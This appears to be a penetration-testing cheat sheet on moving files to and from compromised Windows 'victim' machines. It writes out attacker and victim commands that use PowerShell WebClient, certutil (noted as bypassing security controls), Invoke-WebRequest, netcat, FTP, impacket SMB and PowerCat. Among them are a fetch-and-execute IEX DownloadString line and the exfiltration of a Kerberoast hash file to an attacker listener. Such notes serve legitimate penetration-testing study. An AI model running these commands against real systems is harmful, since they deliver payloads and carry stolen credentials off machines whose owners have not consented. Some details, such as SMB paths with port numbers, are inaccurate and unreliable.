Windows
Uploading Files to Victims in Windows
1. PowerShell Download File
PowerShell provides a built-in method for downloading files directly from a remote web server.
Attacking Machine Command:
python3 -m http.server 8080Victim Machine Command:
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.10.10.1:8080/FileToTransfer','C:\Users\test\Desktop\FileToTransfer')"Explanation: The attacking machine sets up a simple HTTP server using Python, and the victim machine downloads the file using PowerShell’s WebClient object.
2. Certutil
Certutil is a Windows utility that can be leveraged to download files, bypassing certain security mechanisms in place.
Attacking Machine Command:
python3 -m http.server 8080Victim Machine Command:
certutil.exe -urlcache -split -f http://10.10.10.10:8080/FileToTransfer FileToTransferExplanation: The attacker runs a Python HTTP server, and the victim machine uses certutil to download the file.
3. PowerShell IWR (Invoke-WebRequest)
Invoke-WebRequest can be used in PowerShell to download files, similar to wget in Linux.
Attacking Machine Command:
python3 -m http.server 80Victim Machine Command:
iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exeExplanation: The attacker sets up an HTTP server, and the victim uses PowerShell’s iwr command to download and save the file locally.
4. Netcat
Netcat can be used for transferring files to a victim machine by establishing a network connection.
Victim Machine Command:
nc.exe -lvp 4444 > FileToTransferAttacking Machine Command:
nc 10.10.10.2 4444 -w 3 < FileToTransferExplanation: The victim machine listens on port 4444 for incoming data, and the attacker sends the file over to it using nc.
5. FTP
FTP can be used to transfer files between systems. Here’s how to do it using a simple FTP server.
Attacking Machine Command:
twistd -n ftp -r .Victim Machine Command:
ftp
open 10.10.10.1 2121
anonymous
get FileToTransfer
byeExplanation: The attacker runs an FTP server using twistd, and the victim machine connects to it to download the file.
6. SMB
SMB is commonly used for file sharing in Windows environments. This command allows for transferring files over the SMB protocol.
Attacking Machine Command:
impacket-smbserver -smb2support test .Victim Machine Command:
copy \\10.10.10.1:8080\FileToTransfer FileToTransferExplanation: The attacker sets up an SMB server using impacket-smbserver, and the victim copies the file from the SMB share.
Downloading Files from Victims in Windows
1. Netcat
Netcat can be used to receive files from a victim machine by listening on a port.
Attacking Machine Command:
nc -lvp 4444 > hashes.kerberoastVictim Machine Command:
nc.exe 10.10.10.1 4444 -w 3 < hashes.kerberoastExplanation: The attacker listens on port 4444 for incoming data and receives it from the victim using nc.
2. FTP
FTP can also be used to upload files from the victim machine to the attacker’s machine.
Attacking Machine Command:
python -m pyftpdlib -wVictim Machine Command:
ftp
open 10.10.10.1 2121
anonymous
put FileToDownload
byeExplanation: The attacker runs an FTP server, and the victim machine uploads the file using FTP commands.
3. SMB
SMB is also useful for downloading files from the victim machine back to the attacker’s system.
Attacking Machine Command:
impacket-smbserver -smb2support test .Victim Machine Command:
copy FiletoDownload \\10.10.10.1:8080\FiletoDownloadExplanation: The attacker sets up an SMB server and the victim machine retrieves the file from the SMB share.
4. PowerCat
PowerCat is a PowerShell-based tool used for networking. It can be used for file transfers in a similar manner to Netcat.
Victim Machine Command:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoDownload"Attacking Machine Command:
wget http://10.10.10.2:4444/FiletoDownloadExplanation: The attacker listens on port 4444 for incoming data, and the victim machine uses PowerCat to send the file back over to the attacker.
Last updated